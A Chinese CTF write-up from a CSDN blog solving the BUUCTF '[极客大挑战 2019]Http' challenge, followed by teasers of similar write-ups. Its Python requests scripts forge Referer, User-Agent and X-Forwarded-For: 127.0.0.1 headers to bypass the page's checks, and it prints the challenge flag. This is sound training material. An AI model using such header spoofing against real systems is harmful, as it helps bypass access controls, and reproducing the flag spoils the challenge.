[极客大挑战 2019]Http

最新推荐文章于 2024-07-23 23:22:25 发布
最新推荐文章于 2024-07-23 23:22:25 发布
阅读量1.5k 收藏 4
点赞数 1
分类专栏: 安全 CTF WEB安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/satasun/article/details/106265040
版权
安全 同时被 3 个专栏收录
49 篇文章 6 订阅
订阅专栏
CTF
40 篇文章 1 订阅
订阅专栏
WEB安全
38 篇文章 0 订阅
订阅专栏

首先查看源码,发现了Scret.php在这里插入图片描述
访问一下:在这里插入图片描述
说我们不是从https://www.Sycsecret.com访问的,那就使用python修改请求头:

import requests
url = 'http://node3.buuoj.cn:25765/Secret.php'
headers={"Referer":"https://www.Sycsecret.com","Origin":"https://www.Sycsecret.com"}
r = requests.get(url,headers=headers)
with open("1.html",'w')as f:
    f.write(r.text)

运行一下,python自动将html代码写入到1.html中,打开1.html:在这里插入图片描述

这里提示我们需要使用”Syclover”浏览器,这里直接修改UA头即可,加一句headers['User-Agent'] = "Syclover"

import requests
url = 'http://node3.buuoj.cn:25765/Secret.php'
headers={"Referer":"https://www.Sycsecret.com","Origin":"https://www.Sycsecret.com"}
headers['User-Agent'] = "Syclover"
r = requests.get(url,headers=headers)
with open("1.html",'w')as f:
    f.write(r.text)

在这里插入图片描述
locally,那就是需要本地访问,即用XFF头进行伪造,加一句headers['X-Forwarded-For'] = '127.0.0.1'

import requests
url = 'http://node3.buuoj.cn:25765/Secret.php'
headers={"Referer":"https://www.Sycsecret.com","Origin":"https://www.Sycsecret.com"}
headers['User-Agent'] = "Syclover"
headers['X-Forwarded-For'] = '127.0.0.1'
r = requests.get(url,headers=headers)
with open("1.html",'w')as f:
    f.write(r.text)

在这里插入图片描述

flag{dea4ceac-5077-4d04-b0e3-7a7cf17ed028}

不会用python用BP也可以做,附上大佬博客:
https://www.cnblogs.com/wangtanzhi/p/12236844.html

imbia
关注
专栏目录
CTF学习笔记——[极客挑战 2019]Http
Obs_cure的博客
01-10 398
一、[极客挑战 2019]Http 1.题目 2.解题步骤 查看源码的时候发现这里有链接 然后访问发现 猜测需要用burp抓包更改请求头再访问 更改之后提示syclover浏览器访问,于是继续更改 啊 这…他说我只能在本地读取… 这里没遇见过…百度了一下发现可以用XFF头进行伪造,于是继续构造 放包后得到flag 3.总结 主要考察了burp和伪造http协议,以及了解了XFF请求头绕过ip的方法。 4.参考资料 伪造XFF头绕过服务器IP过滤 - dubhe= -博客园 ...
[BUUCTF][极客挑战 2019]Http
朋克归零膏的博客
10-13 729
在CTF中修改http头的操作常有BUUCFT另一题,常用到的值User-AgentReferer。
[极客挑战 2019]Http1
最新发布
2301_79964672的博客
07-23 1023
HTTP Referer(实际上正确的拼写应该是 "referrer",但遵循传统,通常写作 "referer")是一个HTTP请求头字段,它指示一个请求是从哪个页面发起的。HTTP数据包,通常指的是HTTP消息,它由两部分组成:请求行(对于请求消息)或状态行(对于响应消息),以及随后的一系列头部字段(headers),最后是消息体(body,可选)。是一个 HTTP 请求头字段,用于识别通过代理服务器或负载均衡器连接到 Web 服务器的客户端的原始 IP 地址。来分析流量来源,了解访问者的真实 IP。
极客挑战2019http(改包)和BUU BRUTE 1 (爆破)
m0_73770225的博客
11-27 1079
极客挑战2019http(改包)和BUU BRUTE 1 (爆破)
BUUCTF[极客挑战 2019]Http1
qq_35874748的博客
10-18 503
打开题目后: 首先F12找线索,果然发现了一个名为Secret.php的文件,打开它
BUUCTF系列 // [极客挑战 2019] Http
qq_45805420的博客
09-25 1543
前言 本题知识点:常用 HTTP 请求头 WP 打开题目,在页面中没有发现明显的提示,查看网页源码,经搜索后发现一个似乎存在猫腻的网页 ‘Secret.php’ 访问该页面,得到第一个提示 题目要求我们从 ‘https://www.Sycsecret.com’ 进入该页面,故使用 burpsuite 抓包,在请求头中增加 Referer 字段即可 Referer HTTP Referer是 header 的一部分,当浏览器向 Web 服务器发送请求的时候,一般会带上 Referer,告诉服务器该网页是从
[极客挑战 2019]EasySQL1
lljiuhkhk的博客
07-20 2556
CTF,sql注入,web渗透,安全入门
极客挑战 2019Http
Lixunzhe0112的博客
01-17 595
X-Forwarded-For(XFF)是用来识别通过HTTP代理或负载均衡方式连接到Web服务器的客户端最原始的IP地址的HTTP请求头字段。所以直接在请求头下面加入X-Forwarde-For:127.0.0.1再发送就能获取flag。然后又提示我们需要使用Syclover的浏览器,那就是User-Agent。X-Forwarded-For这个参数可以进行代理。这里做了个referer的拦截,我们直接用bp。然后就没思路了,去查找了一下HTTP的请求头。再修改相应的内容重新发送。
[极客挑战 2019]Http 1 一次 http 及 burp suite 的配合使用
生死看淡,不服就干的博客
03-16 637
进入靶机,得到如下界面,没什么特殊的,F12 或者右键 查看网页源码 发现关键文件,尝试访问 得到如下结果 并无特殊之处,只给了一个网址,此地无银三百两,既然是 http 类型的题目,burp suite 抓包,右键–>Send to Repeater 在 Repeater 里修改 Header,提示访问来源不对,此时我们可以通过 Referer 头来伪造链接来源。 HTTP Referer 是 Header 的一部分,当浏览器发送请求的时候带上Referer,告诉服务器该网页是从哪个页面.
[极客挑战 2019]Http 1
weixin_45674567的博客
06-04 1607
查看源码 要来自https://www.Sycsecret.com,那就在Header信息里加Referer, 要使用Syclover浏览器 要本地才能读 flag{f4771669-8eb6-42cd-975a-7ac9c932f38c}
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值